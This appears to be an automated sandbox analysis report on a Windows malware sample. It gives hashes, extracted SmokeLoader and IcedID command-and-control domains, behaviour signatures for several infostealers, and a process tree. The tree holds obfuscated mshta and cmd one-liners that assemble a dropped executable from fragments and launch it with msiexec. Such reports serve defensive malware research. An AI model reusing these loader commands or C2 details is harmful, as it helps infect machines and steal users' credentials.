Resubmissions
23-10-2021 15:52
211023-tbkbesdcfm 1022-10-2021 17:40
211022-v8trsscggr 1022-10-2021 15:55
211022-tc9ygacgan 1022-10-2021 14:38
211022-rz1bfabgb8 10Analysis
-
max time kernel
740s -
max time network
1832s -
platform
windows11_x64 -
resource
win11 -
submitted
22-10-2021 14:38
General
-
Target
Fri051e1e7444.exe
-
Size
403KB
-
MD5
b4c503088928eef0e973a269f66a0dd2
-
SHA1
eb7f418b03aa9f21275de0393fcbf0d03b9719d5
-
SHA256
2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
-
SHA512
c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://gejajoo7.top/
http://sysaheu9.top/
rc4.i32
rc4.i32
Extracted
Family
icedid
Campaign
1875681804
C2
enticationmetho.ink
Signatures
-
IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 16 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
-
Blocklisted process makes network request 40 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 6 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
-
Checks for any installed AV software in registry 1 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 10 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
-
Suspicious use of SetThreadContext 9 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 38 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
-
NSIS installer 4 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 35 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 8 IoCs
-
Modifies system certificate store 2 TTPs 11 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"1⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\CoEA_w0kyWG2WXlI_NmzGIeB.exe"C:\Users\Admin\Pictures\Adobe Films\CoEA_w0kyWG2WXlI_NmzGIeB.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Pictures\Adobe Films\6U5d9bdqsMb6CVYEgAtCoc7k.exe"C:\Users\Admin\Pictures\Adobe Films\6U5d9bdqsMb6CVYEgAtCoc7k.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\QLESn8qIBxPtJtPRbSsyAENo.exe"C:\Users\Admin\Pictures\Adobe Films\QLESn8qIBxPtJtPRbSsyAENo.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\wfTqKDpMOg0gUSDI4WZ8cFpx.exe"C:\Users\Admin\Documents\wfTqKDpMOg0gUSDI4WZ8cFpx.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\mx4lGdzRmaOHuNV50QSkuYOw.exe"C:\Users\Admin\Pictures\Adobe Films\mx4lGdzRmaOHuNV50QSkuYOw.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\fnK4zd6skiJ7xVbd0NQxDWHw.exe"C:\Users\Admin\Pictures\Adobe Films\fnK4zd6skiJ7xVbd0NQxDWHw.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 17285⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ecofo8a9dM9rKhtzF6DUe5WS.exe"C:\Users\Admin\Pictures\Adobe Films\ecofo8a9dM9rKhtzF6DUe5WS.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\DQSpoAhLIdEaLNFmPL1y_5AQ.exe"C:\Users\Admin\Pictures\Adobe Films\DQSpoAhLIdEaLNFmPL1y_5AQ.exe" /mixtwo4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 2605⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\YsPBMke_f_nLTfrT7402u0TT.exe"C:\Users\Admin\Pictures\Adobe Films\YsPBMke_f_nLTfrT7402u0TT.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 2525⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lyDzuY17TkHEDB9thlwY6UXK.exe"C:\Users\Admin\Pictures\Adobe Films\lyDzuY17TkHEDB9thlwY6UXK.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "0avwqQL9G3rPBLd3vS74Ps8l.exe"7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\On307XjhofH5hpn3XhRr0UJT.exe"C:\Users\Admin\Pictures\Adobe Films\On307XjhofH5hpn3XhRr0UJT.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-6TSP9.tmp\On307XjhofH5hpn3XhRr0UJT.tmp"C:\Users\Admin\AppData\Local\Temp\is-6TSP9.tmp\On307XjhofH5hpn3XhRr0UJT.tmp" /SL5="$2029C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\On307XjhofH5hpn3XhRr0UJT.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-95FI4.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-95FI4.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\Reference Assemblies\JQIFIOEXVY\foldershare.exe"C:\Program Files\Reference Assemblies\JQIFIOEXVY\foldershare.exe" /VERYSILENT7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\ba-7ddc2-0ef-cec9c-f5c75d27c13e0\Duxaqabaequ.exe"C:\Users\Admin\AppData\Local\Temp\ba-7ddc2-0ef-cec9c-f5c75d27c13e0\Duxaqabaequ.exe"7⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e68⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:29⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:39⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4268 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4868 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:19⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6124 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6124 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5364 /prefetch:29⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:19⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1060 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6636 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:19⤵
-
-
